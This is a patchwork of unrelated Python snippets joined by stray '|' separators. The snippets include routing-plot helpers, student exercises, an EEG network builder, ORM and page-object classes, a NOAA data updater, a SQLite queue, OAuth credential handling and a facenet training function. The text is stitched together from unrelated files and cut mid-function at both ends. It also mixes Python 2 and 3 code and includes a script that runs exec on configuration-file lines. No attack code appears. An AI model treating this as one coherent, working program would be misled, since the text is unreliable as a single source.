    node_color = []
    node_border = []
    for i, p in enumerate(nodes.keys()):
        label = nodes[p]["label"]
        if label == DEPOT:
            # NOTE(review): the depot node is labelled with DELIVERY ("D")
            # rather than DEPOT — looks like a copy-paste slip; confirm.
            labels[i] = DELIVERY
            node_color.append(BLUE)
            node_border.append(BLACK)
        elif label == SUPPLY:
            labels[i] = i
            node_color.append(GREEN)
            node_border.append(BLACK)
        elif label == DELIVERY:
            labels[i] = i
            node_color.append(RED)
            node_border.append(BLACK)
        graph.nodes[i]["pos"] = p
    return graph, labels, node_border, node_color
def add_vehicle_node_info(instance, ax):
    """
    Function to add information about vehicles for the first plot
    :param instance: Instance object for a given solution
    :param ax: Subplot to plot the information
    :return: Colors corresponding to vehicles used to color edges
    """
    # generate random colors for vehicle routs (seeded so colours are stable)
    np.random.seed(10)
    colors = [
        "#%06X" % np.random.randint(0, 0xFFFFFF)
        for i in range(instance.model_input.num_service_vehicles)
    ]
    (
        num_of_service_vehicles,
        service_vehicles_scooter_cap,
        service_vehicles_battery_cap,
    ) = instance.service_vehicles
    # adding vehicle color description (one coloured text line per vehicle)
    for i in range(len(colors)):
        s = f"Vehicle {(i + 1)}"
        ax.text(
            0,
            1 - 0.03 * i,
            s,
            transform=ax.transAxes,
            c=colors[i],
            fontsize=10,
            weight="bold",
            horizontalalignment="left",
            verticalalignment="top",
        )
    # vehicle info box
    cons = (
        f"Vehicle constraint:\nTime = %d h %d m \n\nCar capacity:\nBattery = %d \nScooters = %d"
        % (
            int(instance.model.get_parameters().shift_duration / 60),
            instance.model.get_parameters().shift_duration % 60,
            service_vehicles_battery_cap,
            service_vehicles_scooter_cap,
        )
    )
    props = dict(boxstyle="round", facecolor="wheat", pad=0.5, alpha=0.5)
    # place a text box in upper left in axes coords
    ax.text(
        0,
        1 - 0.03 * (len(colors) + 1),
        cons,
        transform=ax.transAxes,
        fontsize=10,
        horizontalalignment="left",
        verticalalignment="top",
        bbox=props,
    )
    return colors
def display_edge_plot(instance, ax, s_edge_labels=None):
    """
    Function to display second plot of edges not included in solution
    :param instance: Instance object for a given solution
    :param ax: Subplot
    :param s_edge_labels: Dictionary of edges used in solution; defaults to
        empty for infeasible solutions. (Was a mutable default argument {},
        a Python anti-pattern — now None-guarded; behaviour is unchanged
        since the dict was only read, never mutated.)
    """
    if s_edge_labels is None:
        s_edge_labels = {}
    ax.axis("off")
    # draw nodes
    node_dict = create_node_dict(instance)
    graph, labels, node_border, node_color = make_graph(node_dict, instance.bound)
    edge_labels = {}
    # check to handle infeasible models
    if instance.is_feasible():
        # draw edges and set label (time cost and inventory)
        for x in instance.model.x:
            from_node, to_node, vehicle_id = x
            if instance.model.x[x].x == 0:
                # skip self-loops and edges already drawn in the solution plot
                if (
                    from_node != to_node
                    and (from_node, to_node) not in s_edge_labels
                    and (to_node, from_node) not in s_edge_labels
                ):
                    graph.add_edge(from_node, to_node, color="grey", width=1, alpha=0.2)
                    edge_labels[(from_node, to_node)] = "t = " + str(
                        round(
                            instance.model.get_parameters().time_cost[
                                (from_node, to_node)
                            ],
                            2,
                        )
                    )
    else:
        for x in instance.model.x:
            from_node, to_node, vehicle_id = x
            if (
                vehicle_id == 0
                and instance.model.get_parameters().time_cost[(from_node, to_node)] > 0
            ):
                graph.add_edge(from_node, to_node, color="grey", width=1, alpha=0.2)
                edge_labels[(from_node, to_node)] = "t = " + str(
                    round(
                        instance.model.get_parameters().time_cost[(from_node, to_node)],
                        2,
                    )
                )
    edges = graph.edges()
    e_colors = [graph[u][v]["color"] for u, v in edges]
    e_weights = [graph[u][v]["width"] for u, v in edges]
    pos = nx.get_node_attributes(graph, "pos")
    # draw graph
    edges = nx.draw_networkx_edges(
        graph, pos, edge_color=e_colors, width=e_weights, node_size=1, ax=ax,
    )
    nx.draw_networkx_labels(graph, pos, labels, font_size=1, font_color="w", ax=ax)
    nx.draw_networkx_edge_labels(graph, pos, edge_labels=edge_labels, ax=ax)
    for e in edges:
        e.set_linestyle("dashed")
def convert_geographic_to_cart(nodes, bound):
    """
    Function to convert geographical coordinates to cartesian
    :param nodes: Dictionary of nodes [lat,lon]: type
    :param bound: (lat_min, lat_max, lon_min, lon_max) of the plotting area
    :return: Dictionary of nodes [cart_x, cart_y]: type
    """
    lat_min, lat_max, lon_min, lon_max = bound
    delta_lat = lat_max - lat_min
    delta_lon = lon_max - lon_min
    # Normalise so the bounding box maps onto the unit square (x from lon,
    # y from lat).
    return {
        (lon / delta_lon - lon_min / delta_lon,
         lat / delta_lat - lat_min / delta_lat): value
        for (lat, lon), value in nodes.items()
    }
def add_zones(number_of_zones, ax):
    """
    Function to add zones to solution plot
    :param number_of_zones: int - number of zones per axis
    :param ax: subplot
    """
    step = float(1 / number_of_zones)
    # interior grid positions in (0, 1), excluding the outer border
    ticks = np.arange(step, 1, step)
    for x, y in product(ticks, ticks):
        ax.axhline(x, xmax=0.93, color="black")
        ax.axvline(y, ymax=0.98, color="black")
|
'''
Task 0.
Систему работы с багажом для аэропорта.
Багаж можно поместить в самолет если:
Его ширина < 90 см;
Его высота < 80 см;
Его глубина < 40 см;
ИЛИ
Ширина + высота + глубина < 160.
'''
# Read the luggage dimensions (all in centimetres).
w = float(input('Введите ширину багажа: '))
h = float(input('Введите высоту багажа: '))
d = float(input('Введите глубину багажа: '))
# Accept when all dimensions are positive and either each one fits its limit
# (w<=90, h<=80, d<=40) or the total w+h+d is within 160.
# NOTE(review): the module docstring states strict '<' limits while the code
# uses '<=' — confirm which is intended.
if (w > 0 and h > 0 and d > 0) and ((w <= 90 and h <= 80 and d <= 40) or (w + h + d <= 160)):
    print('Багаж можно поместить в самолет!')
else:
    print('Багаж нельзя поместить в самолет!')
from consultar_notas import *
from utils import *
from criar_conteudos import * |
# In 1994 country A has a population of 25 million and country B 19.9
# million. Their yearly growth rates are 2% and 3% respectively. Report
# the year in which country B's population overtakes country A's.
country_A = 25
country_B = 19.9
year = 1994

# Compound both populations yearly until B catches up with A.
while country_B < country_A:
    country_A += country_A * 0.02
    country_B += country_B * 0.03
    year += 1

print(f'Poblacion de pais 1 {country_A }')
print(f'Poblacion de pais 2 {country_B}')
print(f'año {year}')
|
from lasagne.layers.input import InputLayer
from lasagne.layers.special import NonlinearityLayer
from lasagne.layers.shape import DimshuffleLayer, SliceLayer, FlattenLayer
from lasagne.layers.dnn import Pool3DDNNLayer
from lasagne.nonlinearities import sigmoid
import lasagne
import theano.tensor as T
from braindecode.veganlasagne.nonlinearities import safe_log
from braindecode.veganlasagne.recurrent import BandpassLayer
from braindecode.veganlasagne.tensor_dot import TensorDotLayer
class BandpassSquareClassify(object):
    """
    Builder for a lasagne layer stack: bandpass filtering -> spatial
    filtering -> squaring -> mean pooling -> log -> linear readout ->
    sigmoid, producing a per-timestep binary classification output.

    Constructor arguments are stored verbatim as attributes and consumed
    by get_layers().
    """
    def __init__(self, n_examples, n_time_steps, n_chans,
            n_filters, n_filt_order, truncate_gradient,
            n_pool_len=200, n_spat_filters=20):
        # stash every constructor argument as an attribute of the same name
        self.__dict__.update(locals())
        del self.self  # drop the spurious 'self' entry picked up from locals()
    def get_layers(self):
        """Build the network and return every layer from input to output."""
        in_l = InputLayer((self.n_examples, self.n_time_steps, self.n_chans))
        in_bandpass = InputLayer((self.n_examples, self.n_time_steps, self.n_chans, self.n_filters))
        l_bandpass = BandpassLayer([in_l, in_bandpass], n_filt_order=self.n_filt_order,
            truncate_gradient=self.truncate_gradient)
        # out comes examples x timesteps x chans x filters
        l_spat_filt = TensorDotLayer(l_bandpass, n_filters=self.n_spat_filters,
            axis=2)
        # still examples x timesteps x chans x filters
        l_square = NonlinearityLayer(l_spat_filt, T.sqr)
        # now adding empty chan dim so we can make pooling per output chan
        l_shape_pad = DimshuffleLayer(l_square, (0,'x',1,2,3))
        # examples x convchans x timesteps x chans x filters
        l_pooled = Pool3DDNNLayer(l_shape_pad, pool_size=(self.n_pool_len,1,1),
            stride=1, mode='average_exc_pad')
        # log of pooled power (safe_log avoids log(0))
        l_log = NonlinearityLayer(l_pooled, safe_log)
        # removing empty convchan dim again
        l_sliced = SliceLayer(l_log,indices=0,axis=1)
        # now examples x timesteps x chans x filters
        l_flat = FlattenLayer(l_sliced,outdim=3)
        # now examples x timesteps x features (chans * filters)
        l_dense = TensorDotLayer(l_flat,n_filters=1, axis=2)
        # now examples x timesteps x 1
        l_nonlin = NonlinearityLayer(l_dense, sigmoid)
        return lasagne.layers.get_all_layers(l_nonlin)
from connection import db, Required, PrimaryKey, Optional
class SysModul(db.Entity):
    """Pony ORM entity mapped to the `sys_modul` system-module table."""
    _table_ = 'sys_modul'
    # primary key: module code string
    sysmodul_kode = PrimaryKey(str)
    sysmodul_nama = Required(str)    # module name (presumably display name)
    sysmodul_url = Required(str)     # target URL for the module
    sysmodul_icon = Required(str)    # icon identifier for the UI
    # optional parent module code (NULL for top-level entries)
    sysmodul_parent = Optional(str, nullable=True)
    sysmodul_no_urut = Required(int)  # sort order ("nomor urut")
|
"""
通讯录列表页
"""
from app.企业微信po.page import AddMeberPage
from app.企业微信po.page.basepage import BasePage
class ContactListPage(BasePage):
    """Contact-list page object: entry point for adding and searching members."""
    # visible text of the "add member" entry in the contact list
    # (Chinese UI string; must match the app exactly)
    addmember_text = "添加成员"

    def add_contact(self):
        """
        Tap the "add member" entry, scrolling it into view first.

        :return: page object for the add-member screen
        """
        # BUG FIX: the original re-assigned a dead local `addmember_text`
        # that shadowed the class attribute and was never used; removed.
        self.find_by_scroll(self.addmember_text).click()
        return AddMeberPage(self.driver)

    def search_contact(self):
        """
        Search for a member.

        :return: not implemented yet
        """
        pass
|
#!/usr/bin/env /data/mta/Script/Python3.8/envs/ska3-shiny/bin/python
#########################################################################################
# #
# sci_run_get_radiation_data.py: get NOAA data for radiaiton plots #
# #
# #
# author: t. isobe (tisobe@cfa.harvard.edu) #
# #
# last update: Mar 09, 2021 #
# #
#########################################################################################
import os
import sys
import re
import string
import time
import Chandra.Time
import random
#
#--- reading directory list
#
path = '/data/mta/Script/Interrupt/Scripts/house_keeping/dir_list'
with open(path, 'r') as f:
    data = [line.strip() for line in f.readlines()]
# each line of dir_list looks like "<value> : <variable name>"; exec binds
# the named variable at module level (e.g. data_dir, bin_dir, mta_dir)
for ent in data:
    atemp = re.split(':', ent)
    var = atemp[1].strip()
    line = atemp[0].strip()
    # SECURITY NOTE(review): exec on file contents -- dir_list must be a
    # trusted, locally controlled file
    exec("%s = %s" %(var, line))
#
#--- append a path to a private folder to python directory
#
sys.path.append(bin_dir)
sys.path.append(mta_dir)
#
import mta_common_functions as mcf
#
#--- temp writing file name (randomized to avoid collisions in /tmp)
#
rtail = int(time.time() * random.random())
zspace = '/tmp/zspace' + str(rtail)
#-----------------------------------------------------------------------------------------------
#--- sci_run_get_radiation_data: extract radiation data ---
#-----------------------------------------------------------------------------------------------
def sci_run_get_radiation_data():
    """
    create ACE database: append newly arrived ACE archive entries to the
    per-year radiation data files
    input:  none, but read from:
                /data/mta4/Space_Weather/ACE/Data/ace_7day_archive
                <data_dir>/rad_data<year>     (existing data file)
    output: <data_dir>/rad_data<year>         (updated in place)
    """
#
#--- find today's date
#
    today = time.strftime("%Y:%j:%H:%M:%S", time.gmtime())
    atemp = re.split(':', today)
    year  = int(float(atemp[0]))
    yday  = int(float(atemp[1]))
#
#--- if this is 1st of the year, start from the last day of the last year
#
    oyear = year
    if yday == 1:
        oyear = year - 1
#
#--- read the current data file and find the last entry date/time
#
    ifile = data_dir + 'rad_data' + str(oyear)
    cdata = mcf.read_data_file(ifile)
    try:
        atemp = re.split(r'\s+', cdata[-1])
        lyear = int(float(atemp[0]))
        ltime = get_data_time(cdata[-1])
    except Exception:
        # empty or malformed data file: take everything from the archive
        lyear = oyear
        ltime = 0.0
#
#--- read new data from noaa site via ace site
#
    ifile = '/data/mta4/Space_Weather/ACE/Data/ace_7day_archive'
    data  = mcf.read_data_file(ifile)
#
#--- set two data blocks; one for this year and another for the potential
#--- following year
#
    oline = ''
    nline = ''
    for ent in data:
        atemp = re.split(r'\s+', ent)
        tyear = int(float(atemp[0]))
        stime = get_data_time(ent)
        if stime > ltime:
            if tyear == lyear:
                oline = oline + ent + '\n'
#
#--- a new year started
#
            elif tyear > lyear:
                nline = nline + ent + '\n'
#
#--- print out the data
#
    if len(oline) > 0:
        ofile = data_dir + 'rad_data' + str(oyear)
        with open(ofile, 'a') as fo:
            fo.write(oline)
    if len(nline) > 0:
        ofile = data_dir + 'rad_data' + str(year)
        with open(ofile, 'w') as fo:
            # BUG FIX: the original wrote 'oline' here, so the new year's
            # file received the old year's data and 'nline' was dropped
            fo.write(nline)
#--------------------------------------------------------------------
#-- get_data_time: find time of the data line given in seconds from 1998.1.1
#--------------------------------------------------------------------
def get_data_time(line):
    """
    find the time of a data line in seconds from 1998.1.1
    input:  line  --- data line whose first four columns are
                      <year> <month> <day> <HHMM>
    output: ltime --- time in seconds from 1998.1.1 (Chandra time)
    """
    # raw strings for regexes: '\s' in a plain string is an invalid
    # escape sequence (DeprecationWarning on modern Python)
    atemp = re.split(r'\s+', line)
    dyear = int(float(atemp[0]))
    mon   = int(float(atemp[1]))
    day   = int(float(atemp[2]))
    # fourth column is a zero-padded HHMM string; slice hours and minutes
    hh    = int(float(atemp[3][:2]))
    mm    = int(float(atemp[3][2:4]))
    ltime = convert_to_ctime(dyear, mon, day, hh, mm, 0)
    return ltime
#--------------------------------------------------------------------
#--- convert_to_ctime: convert time in Chandra time --
#--------------------------------------------------------------------
def convert_to_ctime(year, mon, day, hh, mm, ss):
    """
    convert a calendar date/time into Chandra time
    input:  year --- year
            mon  --- month
            day  --- day of month
            hh   --- hours
            mm   --- minutes
            ss   --- seconds
    output: ctime --- Chandra time; seconds from 1998.1.1
    """
    # assemble "<year>:<mm>:<dd>:<hh>:<mm>:<ss>" with zero-padded fields
    parts = [str(year)] + [mcf.add_leading_zero(v) for v in (mon, day, hh, mm, ss)]
    stamp = ':'.join(parts)
    # re-express as year:day-of-year before handing it to Chandra.Time
    stamp = time.strftime('%Y:%j:%H:%M:%S', time.strptime(stamp, '%Y:%m:%d:%H:%M:%S'))
    return Chandra.Time.DateTime(stamp).secs
#--------------------------------------------------------------------
if __name__ == '__main__':
    # script entry point: refresh the per-year ACE radiation data files
    sci_run_get_radiation_data()
|
''' Perform sentiment analysis on the data'''
# import re
# from typing import List
# import logging
# import numpy as np
# import nltk
# from nltk.sentiment.vader import SentimentIntensityAnalyzer
# from wordcloud import WordCloud
# from geotext import GeoText
# logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s')
# def get_nation(text: str) -> str:
# '''
# Get the name of the country mentioned in the text
# ARGS:
# text: Text to be analysed
# RETURNS:
# country: Country with the most mentions in the text
# '''
# mentions = GeoText(text).country_mentions
# if mentions:
# highest_mention_code = max(mentions, key=mentions.get)
# for country, code in GeoText.index.countries.items():
# if code == highest_mention_code:
# return country.lower()
# else:
# return ''
# def get_sentiment(sentiment_predictor: object, document_list: [str]) -> float:
# '''
# Make sentimnet predictions on test data
# ARGS:
# text: List of docs to be analysed
# sentiment_predictor: Model to be used for prediction
# RETURNS:
# sentiment: Get the sentiment value as floating point number
# in the range 0 to 1. 0 Being completely negative and 1 being
# totally positive
# '''
# logging.info('Calculating sentiment...')
# predictions = sentiment_predictor.predict(document_list)
# positives = np.array([pos_prob for pos_prob, neg_prob in predictions])
# mean_positive_sentiment = np.mean(positives)
# return mean_positive_sentiment
# def make_cloud(text: str, outpath: str):
# '''
# Create word cloud and save to path
# ARGS:
# text: Text to be analysed
# outpath: Output path for the word cloud
# '''
# cloud = WordCloud(
# width=400,
# height=400,
# background_color='white',
# max_words=50
# )
# logging.info('Generating word cloud...')
# cloud.generate(text)
# cloud.to_file(outpath)
# def _remove_geography_mentions(text: str) -> str:
# '''Remove geographic mentions from text'''
# geo_obj = GeoText(text)
# geographic_mentions = geo_obj.countries + geo_obj.cities + geo_obj.nationalities
# for m in geographic_mentions:
# text = text.replace(m, ' ')
# return text
# class SentimentAnalyzer(object):
# '''
# Uses sentiment analyser that outputs the sentiment
# in form of dictionary
# The sentiment ranges from -1 to 1
# -1 : Completely negative
# +1 : Completely positive
# 0 : Neutral
# Sentiment Analyzer output
# neg: Negative emotion
# neu: Neutral emotion
# pos: Positive sentiment
# '''
# def __init__(self, article):
# self._article = self.clean_quotes(article)
# self._analyzer = SentimentIntensityAnalyzer()
# @staticmethod
# def clean_quotes(article):
# double_quote_open = u'\u201C'
# double_quote_close = u'\u201D'
# for quote in [double_quote_open, double_quote_close]:
# article = article.replace(quote, '"')
# return article
# @property
# def article(self):
# return self._article
# def mean_sentiment(self) -> float:
# sentiment_arr = self.compound_sentiment()
# return np.mean(sentiment_arr)
# def compound_sentiment(self) -> List[float]:
# quoted_text_list = self.quotes()
# sentiment_list = [self._analyzer.polarity_scores(q) for q in quoted_text_list]
# compound_sentiment_list = [
# sentiment.get('compound') for sentiment in sentiment_list
# ]
# return compound_sentiment_list
# def negative_sentiment(self) -> List[float]:
# quoted_text_list = self.quotes()
# sentiment_list = [self._analyzer.polarity_scores(q) for q in quoted_text_list]
# negative_sentiment_list = [
# sentiment.get('neg') for sentiment in sentiment_list
# ]
# return negative_sentiment_list
# def positive_sentiment(self) -> List[float]:
# quoted_text_list = self.quotes()
# sentiment_list = [self._analyzer.polarity_scores(q) for q in quoted_text_list]
# positive_sentiment_list = [
# sentiment.get('pos') for sentiment in sentiment_list
# ]
# return positive_sentiment_list
# def quotes(self) -> [str]:
# '''Get quoted text from the article'''
# quoted_regex = re.compile('\".*\"')
# quoted_text_list = re.findall(quoted_regex, self._article)
# return quoted_text_list
|
# Exploratory exercise: the commented discount experiments were removed;
# the live code below collects the values of `List` below 5 as strings.
prices = [99, 72, 30, 29, 55]

List = [1, 2, 3, 4, 5, 6, 7, 9]
# BUG FIX: the original did str(list(List[index])) and list(<int>) raises
# TypeError; build the list of strings incrementally instead, printing
# the accumulated list on each match as the loop originally attempted.
NewList = []
for item in List:
    if item < 5:
        NewList.append(str(item))
        print(NewList)
|
# coding=utf-8
"""A thread-safe sqlite3 based persistent queue in Python."""
import logging
import sqlite3
import time as _time
import threading
from persistqueue import sqlbase
sqlite3.enable_callback_tracebacks(True)
log = logging.getLogger(__name__)
class SQLiteQueue(sqlbase.SQLiteBase):
    """SQLite3 based FIFO queue.

    Records are ordered by the AUTOINCREMENT primary key, so ascending
    key order is insertion (FIFO) order.
    """
    _TABLE_NAME = 'queue'
    _KEY_COLUMN = '_id'  # the name of the key column, used in DB CRUD
    # SQL to create a table
    _SQL_CREATE = (
        'CREATE TABLE IF NOT EXISTS {table_name} ('
        '{key_column} INTEGER PRIMARY KEY AUTOINCREMENT, '
        'data BLOB, timestamp FLOAT)'
    )
    # SQL to insert a record
    _SQL_INSERT = 'INSERT INTO {table_name} (data, timestamp) VALUES (?, ?)'
    # SQL to select a record by its rowid
    _SQL_SELECT_ID = (
        'SELECT {key_column}, data, timestamp FROM {table_name} WHERE'
        ' {key_column} = {rowid}'
    )
    # SQL to select the oldest record (FIFO head)
    _SQL_SELECT = (
        'SELECT {key_column}, data, timestamp FROM {table_name} '
        'ORDER BY {key_column} ASC LIMIT 1'
    )
    # SQL to select the oldest record matching a column predicate
    _SQL_SELECT_WHERE = (
        'SELECT {key_column}, data, timestamp FROM {table_name} WHERE'
        ' {column} {op} ? ORDER BY {key_column} ASC LIMIT 1 '
    )
    _SQL_UPDATE = 'UPDATE {table_name} SET data = ? WHERE {key_column} = ?'
    _SQL_DELETE = 'DELETE FROM {table_name} WHERE {key_column} {op} ?'
    def put(self, item, block=True):
        """Serialize *item*, append it to the queue, return its row id."""
        # the block kwarg is a noop and is only here to align with
        # python's queue.Queue API
        obj = self._serializer.dumps(item)
        _id = self._insert_into(obj, _time.time())
        self.total += 1
        self.put_event.set()
        return _id
    def put_nowait(self, item):
        """Alias of put(); inserts never block for this queue."""
        return self.put(item, block=False)
    def _init(self):
        """Extend base init with an action lock and cursor/total recovery."""
        super(SQLiteQueue, self)._init()
        # Action lock to assure that compound actions are *atomic*
        self.action_lock = threading.Lock()
        if not self.auto_commit:
            # Refresh the current cursor after a restart: resume just
            # before the oldest remaining record
            head = self._select()
            if head:
                self.cursor = head[0] - 1
            else:
                self.cursor = 0
        self.total = self._count()
# FIFO is the default behaviour, so the plain queue doubles as the FIFO one
FIFOSQLiteQueue = SQLiteQueue
class FILOSQLiteQueue(SQLiteQueue):
    """SQLite3 based FILO (stack-like) queue.

    Only the head-SELECT is overridden: records are fetched newest-first.
    """
    _TABLE_NAME = 'filo_queue'
    # SQL to select a record (newest first)
    # NOTE(review): unlike the base class, this SELECT omits the timestamp
    # column -- confirm callers do not rely on a 3-column row here.
    _SQL_SELECT = (
        'SELECT {key_column}, data FROM {table_name} '
        'ORDER BY {key_column} DESC LIMIT 1'
    )
class UniqueQ(SQLiteQueue):
    """FIFO queue that silently ignores duplicate items.

    Uniqueness is enforced by the UNIQUE(data) constraint on the
    serialized payload; put() returns None for a duplicate.
    """
    _TABLE_NAME = 'unique_queue'
    _SQL_CREATE = (
        'CREATE TABLE IF NOT EXISTS {table_name} ('
        '{key_column} INTEGER PRIMARY KEY AUTOINCREMENT, '
        'data BLOB, timestamp FLOAT, UNIQUE (data))'
    )
    def put(self, item):
        """Insert *item* unless an equal payload is already queued."""
        # sort_keys makes dict serialization canonical so equal dicts
        # collide on the UNIQUE(data) constraint
        obj = self._serializer.dumps(item, sort_keys=True)
        _id = None
        try:
            _id = self._insert_into(obj, _time.time())
        except sqlite3.IntegrityError:
            # duplicate payload: leave the queue untouched, return None
            pass
        else:
            self.total += 1
            self.put_event.set()
        return _id
|
# classic greedy interval scheduling: sort the connections by right
# endpoint and keep every one whose left endpoint starts at or after
# the right endpoint of the last kept connection
n, m = map(int, input().split())
connections = sorted([list(map(int, input().split())) for _ in range(m)], key=lambda c: c[1])
ans = 0
cut = 0
for conn in connections:
    if conn[0] >= cut:
        ans += 1
        cut = conn[1]
print(ans)
|
# NOTE: Python 2 code (print statements; filter() returns a list here).
my_list = range(16)
# multiples of 3 in 0..15
print filter(lambda x: x % 3 == 0, my_list)
languages = ["HTML", "JavaScript", "Python", "Ruby"]
print filter(lambda x: x == "Python", languages)
squares = range(1, 11)
# NOTE(review): the condition x**2 == x**2 is always true, so this is just
# the squares 1..100; the filter below then keeps those in (30, 70)
squares = [x**2 for x in range(1,11) if (x**2 == x**2)]
print squares
print filter(lambda x: x > 30 and x < 70, squares)
import sys
from typing import List
from leetcode import TreeNode, new_tree
def postorder_traversal(root: TreeNode) -> List[int]:
    """Iterative postorder: emit a root-right-left preorder, then reverse."""
    visited: List[int] = []
    pending = []
    node = root
    while node or pending:
        if node:
            visited.append(node.val)
            pending.append(node)
            node = node.right
        else:
            node = pending.pop().left
    visited.reverse()
    return visited
def postorder_traversal_recursively(root: TreeNode) -> List[int]:
    """Recursive postorder: left subtree, right subtree, then the node."""
    if not root:
        return []
    left = postorder_traversal_recursively(root.left)
    right = postorder_traversal_recursively(root.right)
    return left + right + [root.val]
# smoke test: the iterative version must agree with the recursive reference;
# exit non-zero on the first mismatch so CI notices
tests = [
    new_tree(1, None, 2, 3),
]
for tree in tests:
    expect = postorder_traversal_recursively(tree)
    actual = postorder_traversal(tree)
    if expect != actual:
        message = f"tree: {tree}\nactual: {actual}\nexpect: {expect}"
        print(message, file=sys.stderr)
        sys.exit(1)
|
from __future__ import print_function
import os
from oauth2client import tools, client
from oauth2client.file import Storage
class Authentication:
    """
    OAuth2 credential storage/retrieval for the Google Calendar
    quickstart, built on the (legacy) oauth2client flow.
    """
    def __init__(self):
        try:
            import argparse
            # inherit oauth2client's standard CLI flags
            # (e.g. --noauth_local_webserver)
            self.flags = argparse.ArgumentParser(parents=[tools.argparser]).parse_args()
        except ImportError:
            self.flags = None
        self.setDefaultCredentialProperties()
    def setDefaultCredentialProperties(self):
        """Use ~/.credentials/calendar-python-quickstart.json as the store,
        creating the directory if needed."""
        self.homeDir = os.path.expanduser('~')
        self.credentialDir = os.path.join(self.homeDir, '.credentials')
        if not os.path.exists(self.credentialDir):
            os.makedirs(self.credentialDir)
        self.credentialPath = os.path.join(self.homeDir, '.credentials') and os.path.join(self.credentialDir, 'calendar-python-quickstart.json')
    def getCredentials(self, myClient):
        """
        Return stored credentials, running the OAuth flow when they are
        missing or invalid.

        myClient must expose getSecretFileName(), getScopeByType() and
        an applicationName attribute.
        """
        store = Storage(self.credentialPath)
        credentials = store.get()
        if not credentials or credentials.invalid:
            flow = client.flow_from_clientsecrets(myClient.getSecretFileName(), myClient.getScopeByType('readonly'))
            flow.user_agent = myClient.applicationName
            # NOTE(review): when self.flags is None the flow is never run
            # and invalid credentials are returned as-is -- confirm intended.
            if self.flags:
                credentials = tools.run_flow(flow, store, self.flags)
            print('Storing credentials to ' + self.credentialPath)
        return credentials
|
from django.apps import AppConfig
class IssuesConfig(AppConfig):
    """Django application configuration for the `issues` app."""
    name = 'issues'
|
"""Functions for building the face recognition network.
"""
# MIT License
#
# Copyright (c) 2016 David Sandberg
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# pylint: disable=missing-docstring
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from subprocess import Popen, PIPE
import tensorflow as tf
from tensorflow.python.framework import ops
import numpy as np
from scipy import misc
import matplotlib.pyplot as plt
from sklearn.cross_validation import KFold
from scipy import interpolate
from tensorflow.python.training import training
import random
import re
from collections import Counter
import matplotlib.pyplot as plt
import cv2
import python_getdents
from scipy import spatial
from sklearn.decomposition import PCA
from itertools import islice
import itertools
def _add_loss_summaries(total_loss):
    """Add summaries for losses.

    Generates moving averages for all losses and associated summaries for
    visualizing the performance of the network.

    Args:
        total_loss: Total loss from loss().
    Returns:
        loss_averages_op: op for generating moving averages of losses.
    """
    # Compute the moving average of all individual losses and the total loss.
    # Individual losses are taken from the 'losses' graph collection.
    loss_averages = tf.train.ExponentialMovingAverage(0.9, name='avg')
    losses = tf.get_collection('losses')
    loss_averages_op = loss_averages.apply(losses + [total_loss])
    # Attach a scalar summary to all individual losses and the total loss; do
    # the same for the averaged version of the losses.
    for l in losses + [total_loss]:
        # Name each loss as '(raw)' and name the moving average version of
        # the loss as the original loss name.
        tf.summary.scalar(l.op.name + ' (raw)', l)
        tf.summary.scalar(l.op.name, loss_averages.average(l))
    return loss_averages_op
def train(total_loss, global_step, optimizer, learning_rate, moving_average_decay, update_gradient_vars, summary, log_histograms=True):
    """Build the TF1 training op with global-norm gradient clipping.

    Args:
        total_loss: scalar loss tensor to minimize.
        global_step: step counter, incremented by apply_gradients.
        optimizer: one of 'ADAGRAD'|'ADADELTA'|'ADAM'|'RMSPROP'|'MOM'.
        learning_rate: learning-rate tensor or float.
        moving_average_decay: decay for the variable EMAs.
        update_gradient_vars: variables to compute/apply gradients for.
        summary: unused in this function (kept for caller compatibility).
        log_histograms: whether to add variable/gradient histogram summaries.
    Returns:
        (train_op, grads, grads_clip): training op, raw (grad, var) pairs,
        and the clipped gradient tensors.
    Raises:
        ValueError: for an unknown optimizer name.
    """
    # Generate moving averages of all losses and associated summaries.
    loss_averages_op = _add_loss_summaries(total_loss)
    print('######## length of update_gradient_vars: %d\n' % len(update_gradient_vars))
    # Compute gradients (after the loss averages have been updated).
    with tf.control_dependencies([loss_averages_op]):
        if optimizer=='ADAGRAD':
            opt = tf.train.AdagradOptimizer(learning_rate)
        elif optimizer=='ADADELTA':
            opt = tf.train.AdadeltaOptimizer(learning_rate, rho=0.9, epsilon=1e-6)
        elif optimizer=='ADAM':
            opt = tf.train.AdamOptimizer(learning_rate, beta1=0.9, beta2=0.999, epsilon=0.1)
        elif optimizer=='RMSPROP':
            opt = tf.train.RMSPropOptimizer(learning_rate, decay=0.9, momentum=0.9, epsilon=1.0)
        elif optimizer=='MOM':
            opt = tf.train.MomentumOptimizer(learning_rate, 0.9, use_nesterov=True)
        else:
            raise ValueError('Invalid optimization algorithm')
        grads = opt.compute_gradients(total_loss, update_gradient_vars)
    ### gradient clip for handling the gradient exploding
    gradslist, varslist = zip(*grads)
    grads_clip, _ = tf.clip_by_global_norm(gradslist, 5.0)
    #grads_clip = [(tf.clip_by_value(grad, -1.0, 1.0),var) for grad, var in grads]
    # Apply gradients -- note: the CLIPPED gradients are applied.
    #apply_gradient_op = opt.apply_gradients(grads, global_step=global_step)
    #apply_gradient_op = opt.apply_gradients(grads_clip, global_step=global_step)
    apply_gradient_op = opt.apply_gradients(zip(grads_clip, varslist), global_step=global_step)
    # Add histograms for trainable variables.
    if log_histograms:
        #for var in tf.trainable_variables():
        for var in update_gradient_vars:
            tf.summary.histogram(var.op.name, var)
    # Add histograms for gradients (the un-clipped ones).
    if log_histograms:
        for grad, var in grads:
